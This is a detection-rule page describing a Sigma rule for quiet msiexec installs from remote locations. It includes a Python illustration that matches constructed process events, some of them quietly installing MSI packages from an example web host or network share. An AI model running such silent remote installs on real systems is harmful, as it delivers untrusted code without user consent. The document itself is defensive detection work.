Suspicious Msiexec Quiet Install From Remote Location

Sigma Rules

Summary
This rule detects suspicious use of Msiexec.exe on Windows to quietly install packages sourced from remote locations. Msiexec is a legitimate Windows component for installing Windows Installer packages, but attackers can abuse it to run installations without user interaction (quiet installs) from remote package hosts. The rule monitors process creation for Msiexec.exe invocations whose command line combines flags typical of installation commands with remote resource indicators (http URLs, network paths). It fires only when all of the image and command-line conditions are met, surfacing a defense evasion tactic. Monitoring for this activity matters because ransomware and other malicious software are increasingly delivered this way.
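The following Python is an added illustration of the detection logic the summary describes, not the Sigma rule itself or code from its authors: the flag tokens, the constructed process-creation events and the field names are assumptions modeled on the summary.

```python
# Flag sets are assumptions modeled on the summary above (install action,
# quiet/no-UI switches, remote source markers); they are not the rule's text.
INSTALL_FLAGS = ("/i", "-i", "/package", "-package", "/a", "-a", "/j", "-j")
QUIET_FLAGS = ("/q", "-q")          # covers /q, /qn, /qb, /quiet, -q, ...
REMOTE_MARKERS = ("http", "\\\\")   # URLs (http/https) and UNC paths


def is_msiexec(image: str) -> bool:
    """Image condition: the created process binary is msiexec.exe."""
    return image.lower().endswith("\\msiexec.exe")


def has_flag(cmdline: str, flags) -> bool:
    """True when any whitespace-separated argument starts with one of the flags."""
    tokens = cmdline.lower().split()
    return any(tok.startswith(f) for tok in tokens for f in flags)


def matches(event: dict) -> bool:
    """The rule fires only when every image and command-line condition holds."""
    cmd = event.get("CommandLine", "")
    return (
        is_msiexec(event.get("Image", ""))
        and has_flag(cmd, INSTALL_FLAGS)
        and has_flag(cmd, QUIET_FLAGS)
        and any(marker in cmd.lower() for marker in REMOTE_MARKERS)
    )


def triage(events) -> list:
    """Return the command lines of events that satisfy the rule."""
    return [e["CommandLine"] for e in events if matches(e)]


# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",               # remote URL + quiet
     "CommandLine": r"msiexec.exe /i http://files.example/update.msi /qn"},
    {"Image": r"C:\Windows\System32\msiexec.exe",               # UNC path + quiet
     "CommandLine": r"msiexec.exe /i \\fileserver\share\tool.msi /quiet"},
    {"Image": r"C:\Windows\System32\msiexec.exe",               # local path: no match
     "CommandLine": r"msiexec.exe /i C:\Users\user\Downloads\app.msi /qn"},
    {"Image": r"C:\Windows\System32\msiexec.exe",               # not quiet: no match
     "CommandLine": r"msiexec.exe /i https://vendor.example/setup.msi"},
    {"Image": r"C:\Program Files\Tool\tool.exe",                # wrong image: no match
     "CommandLine": r"tool.exe /i http://vendor.example/x.msi /qn"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Legitimate software deployment tooling that installs from an internal UNC share will also satisfy these conditions, so known deployment hosts should be baselined or filtered before the match is treated as an alert.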
Categories
  • Endpoint
  • Windows
  • Cloud
Data Sources
  • Process
Created: 2022-10-28